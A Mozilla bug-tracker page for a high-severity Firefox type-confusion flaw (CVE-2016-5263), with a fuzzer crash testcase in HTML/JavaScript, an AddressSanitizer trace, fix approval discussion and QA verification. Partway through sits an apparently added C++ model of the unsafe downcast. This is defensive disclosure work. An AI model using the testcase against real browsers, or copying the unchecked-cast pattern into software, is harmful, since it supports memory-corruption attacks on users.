Closed Bug 1276897 (CVE-2016-5263) Opened 3 years ago Closed 3 years ago

Type confusion in nsDisplayList::HitTest

Categories

(Core :: Layout, defect)

49 Branch
defect
Not set

Tracking


VERIFIED FIXED
mozilla50
Tracking Status
firefox47 --- wontfix
firefox48 + verified
firefox49 + verified
firefox-esr45 --- unaffected
firefox50 + verified

People

(Reporter: nils, Assigned: mattwoodrow)

References

Details

(Keywords: csectype-other, regression, sec-high, Whiteboard: [adv-main48+])

Attachments

(1 file)

The following testcase crashes the latest ASAN build of Firefox (buildId 20160523171639).

Testcase (might need a few reloads or a mouse over):

<script>
function start() {
        o37=document.createElement('iframe');
        o122=document.createElement('th');
        o46=document.createElement('iframe');
        o59=document.createElement('input');
        o37.setAttribute('style',"box-shadow:; mix-blend-mode: hard-light; ");
        o528=document.createElement('iframe');
        o122.appendChild(o528);
        o586=document.createElement('tfoot');
        o711=(new DOMParser()).parseFromString(" x<code><output>a<em><tt><noscript></code>",'text/html');
        o718=o711.all[6];
        o720=o711.all[8];
        o720.appendChild(o37);
        o718.appendChild(o46);
        o718.appendChild(o59);
        o720.appendChild(o122);
        o720.appendChild(o586);
        o586.innerHTML="<style>@keyframes{{}}* { perspective: 1cm}{:}\n*{ transform-style: preserve-3d;</style><style id>*{ outline-style: auto;:; float: left</style></svg>";
        document.replaceChild(o711.documentElement,document.documentElement);
}
</script>
<body onload="start()"></body>


ASAN output:

ASAN detected this as a heap-buffer-overflow before minimising. Probably because an adjacent object was allocated.

=================================================================
==5201==ERROR: AddressSanitizer: use-after-poison on address 0x621000a893de at pc 0x7fae8f81b1a0 bp 0x7fffd50a1ff0 sp 0x7fffd50a1fe8
READ of size 1 at 0x621000a893de thread T0 (Web Content)
    #0 0x7fae8f81b19f in IsTransformSeparator /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.h:4159
    #1 0x7fae8f81b19f in IsLeafOf3DContext /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.h:4165
    #2 0x7fae8f81b19f in nsDisplayList::HitTest(nsDisplayListBuilder*, nsRect const&, nsDisplayItem::HitTestState*, nsTArray<nsIFrame*>*) const /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.cpp:2064
    #3 0x7fae8f819f36 in nsDisplayList::HitTest(nsDisplayListBuilder*, nsRect const&, nsDisplayItem::HitTestState*, nsTArray<nsIFrame*>*) const /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.cpp:2080
    #4 0x7fae8f85a548 in nsDisplayTransform::HitTest(nsDisplayListBuilder*, nsRect const&, nsDisplayItem::HitTestState*, nsTArray<nsIFrame*>*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.cpp:6135
    #5 0x7fae8f819f36 in nsDisplayList::HitTest(nsDisplayListBuilder*, nsRect const&, nsDisplayItem::HitTestState*, nsTArray<nsIFrame*>*) const /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.cpp:2080
    #6 0x7fae8f8ca38c in nsLayoutUtils::GetFramesForArea(nsIFrame*, nsRect const&, nsTArray<nsIFrame*>&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsLayoutUtils.cpp:3122
    #7 0x7fae8f8c99de in nsLayoutUtils::GetFrameForPoint(nsIFrame*, nsPoint, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsLayoutUtils.cpp:3074
    #8 0x7fae8f6fbdeb in mozilla::FindFrameTargetedByInputEvent(mozilla::WidgetGUIEvent*, nsIFrame*, nsPoint const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/PositionedEventTargeting.cpp:548
    #9 0x7fae8f96a204 in PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*, nsIContent**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsPresShell.cpp:7903
    #10 0x7fae8ef8e9bb in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/view/nsViewManager.cpp:814
    #11 0x7fae8ef86fc9 in nsView::HandleEvent(mozilla::WidgetGUIEvent*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/view/nsView.cpp:1121
    #12 0x7fae8efd0ffc in mozilla::widget::PuppetWidget::DispatchEvent(mozilla::WidgetGUIEvent*, nsEventStatus&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/PuppetWidget.cpp:345
    #13 0x7fae8aea3ef1 in mozilla::layers::APZCCallbackHelper::DispatchWidgetEvent(mozilla::WidgetGUIEvent&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/gfx/layers/apz/util/APZCCallbackHelper.cpp:469
    #14 0x7fae8e99a5d2 in mozilla::dom::TabChild::RecvRealMouseButtonEvent(mozilla::WidgetMouseEvent const&, mozilla::layers::ScrollableLayerGuid const&, unsigned long const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/ipc/TabChild.cpp:1909
    #15 0x7fae8e99a90c in RecvRealMouseMoveEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/ipc/TabChild.cpp:1886
    #16 0x7fae8e99a90c in non-virtual thunk to mozilla::dom::TabChild::RecvRealMouseMoveEvent(mozilla::WidgetMouseEvent const&, mozilla::layers::ScrollableLayerGuid const&, unsigned long const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/ipc/Unified_cpp_dom_ipc1.cpp:1887
    #17 0x7fae8a07345b in mozilla::dom::PBrowserChild::OnMessageReceived(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/PBrowserChild.cpp:3015
    #18 0x7fae8a1d75cb in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:6441
    #19 0x7fae8995fc33 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1655
    #20 0x7fae8995c765 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1593
    #21 0x7fae89949fd2 in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1560
    #22 0x7fae8996f8d0 in applyImpl<mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()> /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:707
    #23 0x7fae8996f8d0 in apply<mozilla::ipc::MessageChannel, bool (mozilla::ipc::MessageChannel::*)()> /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:713
    #24 0x7fae8996f8d0 in nsRunnableMethodImpl<bool (mozilla::ipc::MessageChannel::*)(), false, true>::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/nsThreadUtils.h:741
    #25 0x7fae8997039f in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:477
    #26 0x7fae8997039f in mozilla::ipc::MessageChannel::DequeueTask::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dist/include/mozilla/ipc/MessageChannel.h:496
    #27 0x7fae88bdd8db in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:1073
    #28 0x7fae88c57e2a in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290
    #29 0x7fae89967562 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:130
    #30 0x7fae898dc22c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:235
    #31 0x7fae898dc22c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #32 0x7fae898dc22c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #33 0x7fae8eff0447 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/widget/nsBaseAppShell.cpp:156
    #34 0x7fae9100b342 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:809
    #35 0x7fae898dc22c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:235
    #36 0x7fae898dc22c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #37 0x7fae898dc22c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #38 0x7fae9100aa21 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:644
    #39 0x48df67 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:231
    #40 0x7fae8641882f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #41 0x48cb3c in _start (/home/nils/fuzzer3/firefox/plugin-container+0x48cb3c)

0x621000a893de is located 3806 bytes inside of 4096-byte region [0x621000a88500,0x621000a89500)
allocated by thread T0 (Web Content) here:
    #0 0x475151 in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x7fae964c475a in PL_ArenaAllocate /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/lib/ds/plarena.c:210
    #2 0x7fae8f805a82 in nsDisplayListBuilder::Allocate(unsigned long) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.cpp:1062
    #3 0x7fae8fa8e71e in operator new /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.h:1359
    #4 0x7fae8fa8e71e in WrapSeparatorTransform /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2145
    #5 0x7fae8fa8e71e in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2479
    #6 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #7 0x7fae8fa17997 in DisplayLine(nsDisplayListBuilder*, nsRect const&, nsRect const&, nsLineList_iterator&, int, int&, nsDisplayListSet const&, nsBlockFrame*, mozilla::css::TextOverflow*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6505
    #8 0x7fae8fa15d2b in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6597
    #9 0x7fae8fa8d24b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2337
    #10 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #11 0x7fae8fa17997 in DisplayLine(nsDisplayListBuilder*, nsRect const&, nsRect const&, nsLineList_iterator&, int, int&, nsDisplayListSet const&, nsBlockFrame*, mozilla::css::TextOverflow*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6505
    #12 0x7fae8fa15d2b in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6597
    #13 0x7fae8fa8d24b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2337
    #14 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #15 0x7fae8fa17997 in DisplayLine(nsDisplayListBuilder*, nsRect const&, nsRect const&, nsLineList_iterator&, int, int&, nsDisplayListSet const&, nsBlockFrame*, mozilla::css::TextOverflow*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6505
    #16 0x7fae8fa15d2b in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6597
    #17 0x7fae8fa8d24b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2337
    #18 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #19 0x7fae8fa17997 in DisplayLine(nsDisplayListBuilder*, nsRect const&, nsRect const&, nsLineList_iterator&, int, int&, nsDisplayListSet const&, nsBlockFrame*, mozilla::css::TextOverflow*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6505
    #20 0x7fae8fa15d2b in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6597
    #21 0x7fae8fa8d24b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2337
    #22 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #23 0x7fae8fa17997 in DisplayLine(nsDisplayListBuilder*, nsRect const&, nsRect const&, nsLineList_iterator&, int, int&, nsDisplayListSet const&, nsBlockFrame*, mozilla::css::TextOverflow*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6505
    #24 0x7fae8fa15d2b in nsBlockFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsBlockFrame.cpp:6597
    #25 0x7fae8fa8d24b in nsIFrame::BuildDisplayListForStackingContext(nsDisplayListBuilder*, nsRect const&, nsDisplayList*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2337
    #26 0x7fae8fa39d7c in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2813
    #27 0x7fae8fa3692e in nsCanvasFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsCanvasFrame.cpp:491
    #28 0x7fae8fa3af62 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2849
    #29 0x7fae8fb0214c in mozilla::ScrollFrameHelper::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsGfxScrollFrame.cpp:3379
    #30 0x7fae8fa3af62 in nsIFrame::BuildDisplayListForChild(nsDisplayListBuilder*, nsIFrame*, nsRect const&, nsDisplayListSet const&, unsigned int) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsFrame.cpp:2849
    #31 0x7fae8fc7fd41 in ViewportFrame::BuildDisplayList(nsDisplayListBuilder*, nsRect const&, nsDisplayListSet const&) /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/generic/nsViewportFrame.cpp:61

SUMMARY: AddressSanitizer: use-after-poison /builds/slave/m-cen-l64-asan-000000000000000/build/src/layout/base/nsDisplayList.h:4159 IsTransformSeparator
Shadow bytes around the buggy address:
  0x0c4280149220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4280149230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4280149240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4280149250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4280149260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4280149270: 00 00 00 00 00 00 00 00 00 f7 f7[f7]f7 f7 f7 f7
  0x0c4280149280: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c4280149290: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x0c42801492a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c42801492b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c42801492c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==5201==ABORTING
Group: core-security → layout-core-security
Component: DOM: Core & HTML → Layout
Does ASAN give the stack for when it was poisoned?
I'm pretty sure this is just an invalid static_cast. nsDisplayTransform is pretty big (it has two 64-byte Matrix4x4 objects before the member being accessed), so it seems likely we're just reading beyond the bounds of what we have allocated.
Assignee: nobody → matt.woodrow
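An added example, not Gecko code and not the patch attached to this bug, modelling the pattern the comment above describes: display items bump-allocated from an arena (the allocation stack shows nsDisplayListBuilder::Allocate over PL_ArenaAllocate), a small item downcast to the large transform item type, and the flag read landing in the still-poisoned arena tail (0xF7, the "Poisoned by user" shadow byte in the ASAN legend). The item types, the arena, and the GetType() check in the hardened helper are assumptions, not the actual fix.

```cpp
// Added example, not Gecko code: a model of the unchecked-downcast pattern.
#include <cstdint>
#include <cstring>
#include <new>

enum class ItemType { Plain, Transform };
struct DisplayItem {
  explicit DisplayItem(ItemType aType) : mType(aType) {}
  virtual ~DisplayItem() = default;
  ItemType GetType() const { return mType; }
  ItemType mType;
};
struct PlainItem : DisplayItem {  // small item: one colour besides base fields
  PlainItem() : DisplayItem(ItemType::Plain) {}
  int mColor = 0;
};
struct Matrix4x4 { float m[16]; };  // 64 bytes, as in the comment above
struct TransformItem : DisplayItem {  // two matrices sit before the flag
  explicit TransformItem(bool aSep)
      : DisplayItem(ItemType::Transform), mIsTransformSeparator(aSep) {}
  Matrix4x4 mTransform{}, mTransformPreserves3D{};
  bool mIsTransformSeparator;
};

// Bump arena standing in for nsDisplayListBuilder::Allocate/PL_ArenaAllocate;
// its unused tail is filled with 0xF7, ASAN's "Poisoned by user" shadow byte.
constexpr uint8_t kPoison = 0xF7;
struct Arena {
  Arena() { std::memset(mBuf, kPoison, sizeof(mBuf)); }
  void* Allocate(size_t aSize) {  // 8-byte aligned bump allocation
    aSize = (aSize + 7) & ~size_t(7);
    if (mUsed + aSize > sizeof(mBuf)) return nullptr;
    void* p = mBuf + mUsed; mUsed += aSize; return p;
  }
  bool Allocated(const void* aAddr) const {  // inside memory handed out so far?
    auto* b = static_cast<const uint8_t*>(aAddr);
    return b >= mBuf && b < mBuf + mUsed;
  }
  uint8_t ByteAt(const void* aAddr) const { return *static_cast<const uint8_t*>(aAddr); }
  alignas(16) uint8_t mBuf[4096];
  size_t mUsed = 0;
};

// Address that static_cast<TransformItem*>(aItem)->mIsTransformSeparator would
// read without a type check; computed, not performed, since that read is undefined.
static const void* UncheckedReadAddress(const DisplayItem* aItem) {
  static const TransformItem probe(false);
  auto off = reinterpret_cast<const uint8_t*>(&probe.mIsTransformSeparator) -
             reinterpret_cast<const uint8_t*>(&probe);
  return reinterpret_cast<const uint8_t*>(aItem) + off;
}

// Hardened form (assumed; the patch is not on this page): check the type first.
static bool IsTransformSeparatorChecked(const DisplayItem* aItem) {
  if (aItem->GetType() != ItemType::Transform) return false;
  return static_cast<const TransformItem*>(aItem)->mIsTransformSeparator;
}

struct Outcome { bool inAlloc; uint8_t byteRead; bool plain; bool transform; };
static Outcome Run() {
  Arena arena;  // constructed layout: transform item first, small item last
  auto* t = new (arena.Allocate(sizeof(TransformItem))) TransformItem(true);
  auto* p = new (arena.Allocate(sizeof(PlainItem))) PlainItem();
  const void* addr = UncheckedReadAddress(p);
  Outcome o{arena.Allocated(addr), arena.ByteAt(addr),
            IsTransformSeparatorChecked(p), IsTransformSeparatorChecked(t)};
  p->~PlainItem(); t->~TransformItem();
  return o;
}
```

Run() shows the unchecked read's address falling outside every allocation, the poison byte sitting there, and the checked helper answering for the small item without touching that memory.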
Attached patch invalid-castSplinter Review
Attachment #8758504 - Flags: review?(tlee)
[oops, sorry for flag-clearing; tweaked the wrong bug.]
Keywords: sec-high
Attachment #8758504 - Flags: review?(tlee) → review+
Looking at the code, it looks like we're affected all the way back to 47 (which is just about to ship). 46 looks to have been unaffected, but we no longer have flags for that.
Comment on attachment 8758504 [details] [diff] [review]
invalid-cast

[Security approval request comment]
>How easily could an exploit be constructed based on the patch?

I'm not sure. It's pretty obvious that it's an invalid cast, but I'm not sure how easy it is to exploit that.

>Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

No.

>Which older supported branches are affected by this flaw?

47 and above. 46 is unaffected.

>If not all supported branches, which bug introduced the flaw?

Bug 1226904

>Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

I haven't checked, but the current patch should apply to all branches.

>How likely is this patch to cause regressions; how much testing does it need?

Very unlikely to cause regressions.
Attachment #8758504 - Flags: sec-approval?
Sec-approval+ for checkin on June 21 (two weeks into the new cycle).
Whiteboard: [checkin on 6/21]
Attachment #8758504 - Flags: sec-approval? → sec-approval+
Tracking since it's sec critical
Blocks: 1226904
Flags: sec-bounty?
Matt, don't forget to land this patch when you're back.
Flags: needinfo?(matt.woodrow)
(In reply to Mats Palmgren (:mats) from comment #9)
> Matt, don't forget to land this patch when you're back.

done 

https://hg.mozilla.org/integration/mozilla-inbound/rev/5b09c44427fd
Flags: needinfo?(matt.woodrow)
Keywords: checkin-needed
Whiteboard: [checkin on 6/21]
https://hg.mozilla.org/mozilla-central/rev/c9fa56422289
Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla50
Flags: sec-bounty? → sec-bounty+
Group: layout-core-security → core-security-release
Matt can you also request uplift since this is sec-high? We could still get it into aurora and into beta 9 next monday. Thanks!
Flags: needinfo?(matt.woodrow)
Comment on attachment 8758504 [details] [diff] [review]
invalid-cast

Approval Request Comment
[Feature/regressing bug #]: Bug 1226904
[User impact if declined]: Security bug
[Describe test coverage new/current, TreeHerder]: Tested manually.
[Risks and why]: Very low risk, pretty obvious invalid cast.
[String/UUID change made/needed]: None.
Flags: needinfo?(matt.woodrow)
Attachment #8758504 - Flags: approval-mozilla-beta?
Attachment #8758504 - Flags: approval-mozilla-aurora?
Comment on attachment 8758504 [details] [diff] [review]
invalid-cast

sec-high, taking it.
Should be in 48 rc
Attachment #8758504 - Flags: approval-mozilla-beta?
Attachment #8758504 - Flags: approval-mozilla-beta+
Attachment #8758504 - Flags: approval-mozilla-aurora?
Attachment #8758504 - Flags: approval-mozilla-aurora+
Flags: qe-verify+
Unable to crash Nightly asan & debug builds from 2016-05-23, under Ubuntu 16.04 64-bit and Mac OS X 10.11.1. However, the following output was displayed in the Terminal:
[Parent 601] ###!!! ASSERTION: Why do we still have a child doc?: '!mOuterDoc', file /builds/slave/m-cen-m64-d-000000000000000000/build/src/accessible/ipc/ProxyAccessible.cpp, line 26
WARNING: NS_ENSURE_TRUE(mBoundFrame) failed: file /builds/slave/m-cen-m64-d-000000000000000000/build/src/dom/html/nsTextEditorState.cpp, line 1722
The above Terminal output was not reproducible with Firefox 48 beta 10, latest Dev Edition 49.0a2 and Nightly 50.0a1, across platforms [1]. Matt, any idea why I couldn't reproduce the crash on a known bad build? Thanks in advance!

[1] Windows 10 64-bit, Ubuntu 16.04 64-bit and Mac OS X 10.11.1
Flags: needinfo?(matt.woodrow)
(In reply to Alexandra Lucinet, QA Mentor [:adalucinet] from comment #19)
> Unable to crash Nightly asan & debug builds from 2016-05-23, under Ubuntu
> 16.04 64-bit and Mac OS X 10.11.1. Although, the following output was
> displayed in the Terminal:
> [Parent 601] ###!!! ASSERTION: Why do we still have a child doc?:
> '!mOuterDoc', file
> /builds/slave/m-cen-m64-d-000000000000000000/build/src/accessible/ipc/
> ProxyAccessible.cpp, line 26
> WARNING: NS_ENSURE_TRUE(mBoundFrame) failed: file
> /builds/slave/m-cen-m64-d-000000000000000000/build/src/dom/html/
> nsTextEditorState.cpp, line 1722
> The above Terminal output was not reproducible with Firefox 48 beta 10,
> latest Dev Edition 49.0a2 and Nightly 50.0a1, across platforms [1]. Matt,
> any idea why i couldn't reproduce the crash on a known bad build? Thanks in
> advance!
> 
> [1] Windows 10 64-bit, Ubuntu 16.04 64-bit and Mac OS X 10.11.1

I don't, sorry. I had real problems reproducing it too. It seems to be intermittent.
Flags: needinfo?(matt.woodrow)
Alias: CVE-2016-5263
Whiteboard: [adv-main48+]
Matt, thanks for your prompt reply!
Since the assertion is no longer visible and I'm unable to reproduce after several attempts with latest builds, across platforms, I think we're safe to call this issue verified. Marking accordingly.
Status: RESOLVED → VERIFIED
Flags: qe-verify+
Group: core-security-release